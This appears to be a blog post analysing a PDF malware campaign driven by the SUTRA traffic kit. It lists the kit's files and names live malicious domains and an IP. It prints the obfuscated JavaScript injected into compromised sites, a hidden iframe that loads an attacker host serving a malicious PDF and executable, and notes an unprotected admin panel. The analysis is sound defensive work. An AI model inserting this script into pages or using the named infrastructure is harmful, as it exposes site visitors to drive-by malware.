Black Hat SEO - PDF Malware campaign

The silent threat: Black Hat SEO - PDF Malware campaign Previously in March, Abode has released some security updates addressed to vulnerabilities and exploits using Adobe Reader. Some links can be found below McAfee Avert Labs: New Backdoor Attacks using PDF Documents Trend Micro Malware Blog: Portable Document Format or Portable Malware Format? SANS Internet Storm Center: Adobe/Acrobat 0-day in the wild? Adobe Security Bulletin: Buffer overflow issue Here is a complete example with sreenshots, data and analysis of a website used in the PDF malware campaign and hosting a malicious application called SUTRA. The application also known as "Traffic Management System" is explained by McAfee AvertLabs on this page: Inside the malicious traffic This cybercrime toolkit is actively used to manage traffic from compromised websites and redirects visitors to exploits code or other malicious URLs with fake codecs, rogue antispyware application, keyloggers, bankers trojan and many more. We have another example of a compromised website explained here. Screenshot of SUTRA can be found. *** Now let's take a look of another website used. The site is "salevisitor.net" 89.107.104.10 [Do not enter this site unless you know what you are doing] The payload is located here "salevisitor.net/in.cgi?6" [Unstable - file not found at this time] Just for your information, this is the structure of files/folders for SUTRA Traffic Manager drwxr-xr-x (755) admin drwxrwxrwx (777) data drwxr-xr-x (755) files drwxr-xr-x (755) html drwxr-xr-x (755) install drwxrwxrwx (777) memory drwxrwxrwx (777) stats drwxrwxrwx (777) admin/tmp drwxrwxrwx (777) admin/tmp.web     -rwxr-xr-x (755) getos.cgi -rwxr-xr-x (755) in.cgi -rw-r--r-- (644) index.html     admin:   -rwxr-xr-x (755) c.cgi -rwxr-xr-x (755) center.cgi -rwxr-xr-x (755) cron -rwxr-xr-x (755) cron.sh -rw-r--r-- (644) index.html -rw-r--r-- (644) panel.html drwxrwxrwx (777) tmp drwxrwxrwx (777) tmp.web -rwxr-xr-x (755) ub_fetcher     data:   -rw-r--r-- (644) admin_forces.html -rw-r--r-- (644) connection_type.html -rw-r--r-- (644) connection_type_new.html -rw-r--r-- (644) crontab_wizard.html -rw-r--r-- (644) edit_force_data.html -rw-r--r-- (644) edit_force.html -rw-r--r-- (644) edit.html -rw-r--r-- (644) edit_user.html -rw-r--r-- (644) force_data.html -rw-r--r-- (644) force.html -rw-r--r-- (644) forces.html -rw-r--r-- (644) forces_view.html -rw-r--r-- (644) general_stat.html -rw-r--r-- (644) GeoIP.dat -rw-r--r-- (644) geoip.html -rw-r--r-- (644) global_options.html -rw-r--r-- (644) global_vars.html -rw-r--r-- (644) import.html -rw-r--r-- (644) index.html -rw-r--r-- (644) key -rw-r--r-- (644) login.html -rw-r--r-- (644) lstats_export.html -rw-r--r-- (644) lstats.html -rw-r--r-- (644) main.html -rw-r--r-- (644) navigation.html -rw-r--r-- (644) page.html -rw-r--r-- (644) pages_navigation.html -rw-r--r-- (644) profile.html -rw-r--r-- (644) pstats_export.html -rw-r--r-- (644) pstats.html -rw-r--r-- (644) pstats_index.html -rw-r--r-- (644) register_done.html -rw-r--r-- (644) register.html -rw-r--r-- (644) search.html -rw-r--r-- (644) show_bottom.html -rw-r--r-- (644) show_data.html -rw-r--r-- (644) show_header.html -rw-r--r-- (644) stat_daily.html -rw-r--r-- (644) static_stat.html -rw-r--r-- (644) stat_main.html -rw-r--r-- (644) stats.html -rw-r--r-- (644) uptime_main.html -rw-r--r-- (644) users.html     files:   -rw-r--r-- (644) cgi.pm -rw-r--r-- (644) counter.gif -rwxr-xr-x (755) curl -rwxr-xr-x (755) default.cgi -rwxr-xr-x (755) gotourl.cgi     html:   -rw-r--r-- (644) image files and javascript (gif, js)     install:   drwxr-xr-x (755) freebsd4 // in.cgi drwxr-xr-x (755) freebsd5 // in.cgi drwxr-xr-x (755) freebsd6 // in.cgi drwxr-xr-x (755) linux // in.cgi     stats:   -rw-r--r-- (644) index.html The admin page has no password on this server so you can enter and see stats like: So now we know the IP, domain name, URLs used after redirection but from were is coming the traffic? Let's take a look of another folder "/memory/" This folder has files like 1.access.log, 2.access.log, 5.access.log, 25.access.log, 70.access.log etc... Some related topics on this blog refer to onlinedetect.com, 0day33hours.com for another malware campaign... Similars files can be found using google. here and here 2.access.log - The file contain the IP of visitors reaching infected websites, some are in Czech Republic, Israel, Russia, Turkey etc. The file also reveal the URL of some compromised websites were the malicious obfuscated javascript code has been inserted. Line 1: hxxp://www.met[BLOCKED]p.com.pl/meta........... Javascript Analysis Line 23: 77.250.xx.xx http%3A%2F%2Fwww%2Este[BLOCKED]tos%2Enl%2Find..... Javascript Analysis hxxp://www.gif[BLOCKED]za.pl/gify/baj... Javascript Analysis The analysing confirm that all these site has the same code added <script> if (!myia){ document.write(unescape(' %3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63 %31%35%20%73%72%63%3d%27%68%74%74%70%3a%2f %2f%73%61%6c%65%76%69%73%69%74%6f%72%2e%6e %65%74%2f%69%6e%2e%63%67%69%3f%32&%27%2b% 4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74% 68%2e%72%61%6e%64%6f%6d%28%29%2a%32%31%35% 32%38%29%2b%27%37%30%65%33%66%35%31%63%35% 27%20%77%69%64%74%68%3d%35%32%20%68%65%69% 67%68%74%3d%34%31%34%20%73%74%79%6c%65%3d% 27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65% 27%3e%3c%2f%69%66%72%61%6d%65%3e')); } var myia = true; </script>   <iframe name=c15 src='http://salevisitor.net/in.cgi?2&'+ Math.round(Math.random()*21528)+'70e3f51c5' width=52 height=414 style='display: none'></iframe> Analysis report for hxxp://salevisitor.net/in.cgi?2 The script load a PDF located here quara-best.com/[BLOCKED]e30/pdf.php?id=5352 which then load this executable --> VirusTotal Report ****************** Some other related link: Honeynet Malware Detail Analysis of hxxp://eternal.alfamoon.com here MySpace Profile Attacked (screenshot below)